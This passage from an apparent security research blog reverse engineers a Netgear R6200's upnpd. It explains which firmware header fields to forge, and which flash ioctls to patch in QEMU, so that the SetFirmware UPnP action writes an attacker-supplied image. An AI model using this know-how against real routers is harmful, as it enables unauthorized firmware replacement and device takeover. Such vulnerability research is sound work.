The error message belies someone's continued confusion over exactly how this capability is supposed to work. If the size validation fails, the error message is "The kernel image is over 512Kbytes!", although the test was against a 4MB upper limit.

Inserting the proper TRX image size (or "kernel size" as the error message indicates) at offset 24 gets past this step. After the check, a function is called at 0x0042428C, sa_upgrade_setImageInfo(), that parses out several more values from the header. Again, no validation is performed on these values at this point. It remains to be seen if they are the same fields and will be used in the same way as in httpd.

After this function is called, things begin to get interesting in a few ways. After a temporary "upgrade" file is created (but never used; wtf), /dev/mtd1 device is opened. You'll need to work around the fact that QEMU doesn't provide this device. The following following things will fail if not addressed.

First, opening mtd1 will fail if it doesn't already exist. Create an empty file to ensure the open() operation is successful.

Opening /dev/mtd1 with O_RDWR.

Next, a series of ioctl()s is performed on the open file descriptor. To understand what these operations do, it's helpful to refer to mtd.c from the OpenWRT source code as a guide.

The first ioctl() will fail in emulation since we're just providing a regular file, not a device node. Patch out this operation with something that puts 0 in $v0, such as xor $v0,$v0.

ioctl is patched out.

This ioctl() we just patched out obtains, among other things, the erase size (i.e., block size) for the mtd device. We can simulate that result by patching at 0x0042453C where the the erase size is loaded into register $s5.

It doesn't matter a great deal what you use for the erase size in emulation. The write loop will write the firmware in blocks of that size, then it will write any remaining fractional block at the end. An actual R6200 device reports a block size of 65536, or 0x10000, so that's a good number to use. Patching this instruction with:

lui $s5, 1

loads 1 into the upper half of register $s5 and 0x0 into the lower half, resulting in a value of 0x10000.

Patch in a constant 0x10000 for mtd1 block size.

Next, in the basic block starting at 0x004245D0, there are two more ioctl()s. The first one most likely unlocks the current portion of flash for writing. The return value from it isn't checked, end execution immediately proceeds to the second. Based on the error message, the second one erases the block of flash so it can be rewritten. With our fake /dev/mtd1 there's no need to erase, so we can patch out this operation as before.

Patch out the ioctl() to erase flash memory.

Now, having patched out the ioctl()s that fail in emulation, writing to a regular file should work as normal. There is one more field that, while not validated directly, does affect what data gets written. When analyzing httpd, we discovered the field at offset 28 that contains the size of a theoretical second partition. In stock firmware this field is zeroed out. In upnpd, at 0x004245C0, this value is added to the address of the TRX image, and the result is the start of data that gets written to flash.

The start of firmware data is calculated.

In other words, the pointer to data that gets written is calculated as:

This doesn't make sense and further belies the programmer's confusion over how this algorithm should work and how the firmware should be formatted. At any rate, if we zero out the field at byte 28, everything works fine. The address of the TRX image will be the start of data written to flash.

At this stage upnpd is ready to write our firmware to /dev/mtd1. Let's have a review of what portions of the ambit header had to be verified before getting here.

There's our familiar ambit header. It looks similar to the header diagram from our httpd analysis, except there's still lot of gray in there. Only six fields have been validated by upnpd up to this point:

Ambit magic number

Header length

Header checksum

TRX image size (partition 1, aka "kernel")

Partition 2 size (not validated, but affects what gets written to flash)

Board ID string

That was easier than expected. When I sent the "firmware image" generated from random data to upnpd, my QEMU machine rebooted. This is because after the write loop, upnpd triggers a reboot so the new firmware will take effect. Our fake "/dev/mtd1" has even grown to 3.9MB as a result of the firmware writing.

At this point we've successfully exploited the SetFirmware UPnP SOAP action. We've gone as far as we can go with emulation. From here we'll move to physical hardware to test and develop the deployment of our firmware. In the next post, I'll describe connecting to the R6200 router's debug interface over its UART connection, so get your soldering iron ready.

Spoiler: I'll go ahead and say we're not quite home free yet. Don't attempt to generate an image and flash it to your router yet. At best, the write will still fail. At worst, you'll brick it. Besides not having generated a valid squashfs filesystem and TRX image, there at least two more header fields that will trip you up before you're done. Once we get access over UART figured out, it will be possible to recover a bricked device.